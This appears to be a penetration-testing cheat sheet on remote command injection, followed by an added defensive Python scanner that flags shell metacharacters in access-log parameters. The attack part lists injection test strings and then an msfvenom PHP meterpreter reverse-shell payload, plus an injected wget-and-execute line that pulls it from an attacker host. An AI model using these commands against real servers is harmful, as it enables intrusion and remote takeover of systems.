Remote command injection

Check every input the web server accepts: GET parameters, POST parameters and HTTP headers.

;

The semicolon is the most common metacharacter used to test for an injection flaw. The shell runs all the commands separated by the semicolon, in sequence.

&

It separates multiple commands on one command line. It runs the first command then the second command.

&&

It runs the command following && only if the preceding command is successful.

|| (Windows)

It runs the command following || only if the preceding command fails: the first command runs, and the second command runs only if the first did not complete successfully.

| (Linux)

Redirects the standard output of the first command to the standard input of the second command.

`

The unquoting metacharacter (the backtick) forces the shell to interpret and run the command between the backticks. The following is an example of this:

Variable="OS version `uname -a`" && echo $Variable

()

It is used to nest commands

Examples:

| ping -i 30 127.0.0.1 |
| ping -n 30 127.0.0.1|
& ping -i 30 127.0.0.1&
&ping -n 30 127.0.0.1&
;ping -i 30 127.0.0.1;
%0a ping -i 30 127.0.0.1 %0a
` ping 127.0.0.1

If any of the above works, use msfpayload to create the following:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=666 -e php/base64 -f raw > /root/Desktop/exploit.txt

Open the exploit.txt file and add the PHP opening and closing tags:

 <?php echo ... ?>

Start an HTTP web server and execute the following:

;wget http://<attacking_ip>/exploit.txt  -O /tmp/exploit.php;php -f /tmp/exploit.php
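
A defender-side check for the metacharacters and test strings listed above, as an added example that is not part of the original post: it URL-decodes the query parameters in access-log lines and reports which metacharacters each one contains. The log lines are constructed, and /ping.php, /search.php and the parameter names are hypothetical; POST bodies and headers do not appear in a standard access log and are not covered here.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Metacharacters from the list above; two-character operators come first so
# "&&" and "||" are reported as themselves rather than as "&" or "|".
META = re.compile(r"&&|\|\||[;&|`()\n]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed access-log lines (not real traffic); paths and parameters are hypothetical.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /ping.php?host=127.0.0.1 HTTP/1.1" 200 312',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /ping.php?host=127.0.0.1%3Bping+-i+30+127.0.0.1%3B HTTP/1.1" 200 312',
    '10.0.0.9 - - [01/Jan/2024:10:01:12 +0000] "GET /ping.php?host=127.0.0.1%0a+ping+-i+30+127.0.0.1+%0a HTTP/1.1" 200 312',
    '10.0.0.9 - - [01/Jan/2024:10:02:20 +0000] "GET /ping.php?host=127.0.0.1%7C+ping+-n+30+127.0.0.1%7C HTTP/1.1" 200 312',
    '10.0.0.7 - - [01/Jan/2024:10:03:00 +0000] "GET /search.php?q=rock+%26+roll HTTP/1.1" 200 950',
]

def find_meta(value):
    """Return the sorted metacharacters found in one decoded parameter value."""
    return sorted({m.group(0) for m in META.finditer(value)})

def scan_log(lines):
    """Return (client, path, parameter, metacharacters) for each flagged parameter."""
    hits = []
    for line in lines:
        request = REQUEST.search(line)
        if not request:
            continue
        client = line.split(" ", 1)[0]
        url = urlsplit(request.group(1))
        # Split on the literal "&" first, then decode, so an encoded %26 or %3B
        # stays inside the value it was sent in.
        for pair in url.query.split("&"):
            name, _, raw = pair.partition("=")
            found = find_meta(unquote_plus(raw))
            if found:
                hits.append((client, url.path, name, found))
    return hits

if __name__ == "__main__":
    for client, path, name, found in scan_log(SAMPLE_LOG):
        print(f"{client} {path} param={name} metacharacters={found!r}")
```

The "rock & roll" hit shows why this is a triage signal rather than a verdict: &, ( and ) are common in legitimate input, so weight each hit by whether that parameter ever reaches a shell.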
